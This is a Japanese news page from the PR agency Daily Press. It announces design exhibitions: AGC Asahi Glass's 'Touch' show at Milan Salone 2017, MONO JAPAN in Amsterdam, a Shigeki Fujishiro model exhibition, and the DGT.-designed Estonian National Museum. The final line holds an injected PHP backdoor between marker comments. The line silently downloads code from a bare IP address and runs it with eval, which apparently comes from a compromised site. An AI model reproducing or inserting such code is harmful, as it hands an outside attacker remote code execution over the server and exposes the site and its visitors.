デイリープレス

“Touch” Presented by AGC Asahi Glass

毎年4月に、イタリア・ミラノで開催されている「ミラノ国際家具見本市」。本会場の他、ミラノ市街地各所で開催される展示会、展覧会を含め、通称「ミラノサローネ」と呼ばれています。世界中から有名ブランドや新進気鋭の新しいデザイナーによる最先端のデザイン、インテリアが発表されています。

建築、自動車、ディスプレイ用ガラスを中心に製造、販売を行うAGC旭硝子が同期間中に展覧会 "Touch "を開催中。現地よりレポートします。

透明で硬質な素材であるガラスは、その美しさゆえに古代から人々の生活に深く結びつき「空間を仕切る」「保護する」「装飾する」という用途で多く使用されてきました。現在では、ごく薄く、割れにくいガラスが開発され 、スマートフォンのカバーガラスに代表されるように「直接触れるもの」という用途がますます広がってきています。
本展では、その一端を担ってきたAGC旭硝子の加工技術を用いてデザイナーの倉本仁氏、Raw-Edgesとともにガラス作品を制作、展示しました。
両デザイナーともに、「揺らす」「叩く」「回す」「描く」など、さまざまな行動を誘発するオブジェや遊具を制作。自らの手で起こしたアクションにより、ガラスを透過した光や色が揺らめき、音を奏で、空間に柄が浮かび上がります。
それぞれの作品に使われているガラスには、視覚的表情を持たせる加工やナノ単位の微細なテクスチャ実現するコーティングなど様々な加工技術が用いられています。
それぞれの作品に直接触れることで、進化したガラスが持つ、新たな可能性を体感できます。

オフィシャルサイト
http://www.agc-milan.com

会期:2017年4月4日(火)~9日(日)
会場:スーパースタジオ・ピュー (ミラノ トルトーナ地区)
クリエーションパートナー
倉本 仁(Jin Kuramoto) http://www.jinkuramoto.com/
Raw-Edges(ロウ・エッジズ) http://www.raw-edges.com/

下記の#で、来場者や制作スタッフによる会場の写真、動画がアップされています。
#agc_touch
read more

ミラノサローネのご案内 2017

毎年4月にイタリア ミラノで開催される、International Salone del Mobire(ミラノ国際家具見本市)通称、ミラノサローネが、4月4日からスタートします。
デイリープレスがPRを担当する会場のご案内です。

news / 2017.03.29

tags: exhibition, Milano Salone

私どもが担当する会場の他、日頃よりお世話になった方々や、日本の企業やクリエイターの方々の展示会場、市内のショールームなどをGoogle Mapsにまとめております。
全ての会場を網羅できておりませんが、ぜひご参照下さい。

下記のリンクよりご覧下さい。
Milano Salone 2017 prepared by daily press

※スマートフォンから閲覧する際は、アプリよりもWEBブラウザから閲覧したほうが使いやすいようです。
read more

MONO JAPAN
Japanese Craft & Design

アムステルダム発、日本のクラフトやデザインプロダクトに特化した展示・即売会「MONO JAPAN - Japanese Craft & Desgin」。
今年もアムステルダムのカルチャー発信の中心、世界中からクリエイターが集うLloyd Hotel(ロイドホテル)全体がMONO JAPANの会場です。

news / 2017.01.16

tags: event, exhibition

会期:2017年2月2日(木) – 2月5日(日)
   3日(金)・4日(土)11:00 – 20:00、5日(日)11:00 – 18:00
   2日(木)はプレス&バイヤーの方のみ
会場:Lloyd Hotel & Coltural Embassy
   (Oostelijke Handelskade 34, 1019 BN Amsterdam)

お問い合わせ:03-6416-3201
        naotakegata@dailypress.org

詳細はプレスリリースをご参照ください。
プレスリリースのダウンロードはこちらより

Studies
Shigeki Fujishiro

Photo: Gottingham

プロダクトデザイナー藤城成貴がこれまでに製作してきた模型の数々を展示します。
彼はデザインのプロセスで模型製作を欠かさず行います。
できるだけ現物に近い模型を作り、かたちや色の確認はもちろんのこと、
具体的なシーンに模型を置き、写真撮影をします。
写し出されたものを見ることで、一旦自分から距離をおき、
あたかも別の誰かがデザインしたものを見ているかのような状況を作る。
この時が、自分のアイデアが本当に意味のあるものなのかと、
冷静に判断ができるタイミングなのだと言います。

news / 2016.12.09

tags: event, exhibition, Naname

会期:2016年12月17日(土) – 12月25日(日)
   11:00 – 19:00 (12月25日は18:00まで)
会場:Naname(東京都目黒区青葉台3-5-33 川邊ハイツ1F デイリープレス内) read more

DGT. が手がけるエストニア・ナショナル・ミュージアム
「MEMORY FIELD」2016年10月1日オープン

パリを拠点に活動する建築家ユニットDGT.の田根剛、ダン・ドレル、リナ・ゴットメが手がけるエストニア・ナショナル・ミュージアムが、10年の歳月をかけていよいよ10月1日にオープンします。
  
ナショナル・ミュージアムが建設されるのは、首都タリンの次に人口が多く、文化・学術の街として知られるタルトゥ。市街から車で5分も行くと現れる広大な森の中です。
そしてここはエストニアが旧ソ連占領下の時代に軍用地だった場所。
1991年の独立後も取り残されていた軍用地に横たわる滑走路の延長線上に、ミュージアムは直結されました。
負の遺産に横たわる、膨大なコンクリートで作られたかつての滑走路のその先に、空へと立ち上っていくように延びる力強い一本の線。一本の線が空と大地を分けるその場所で過去は未来に繋がります。歴史を伝えこれからを見つめる場所として、エストニアの人々が待ちに待ったナショナル・ミュージアムの完成です。

news / 2016.08.10

tags: DGT., information, new open

『エストニア国立博物館 / ESTONIAN NATIONAL MUSEUM』 read more

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>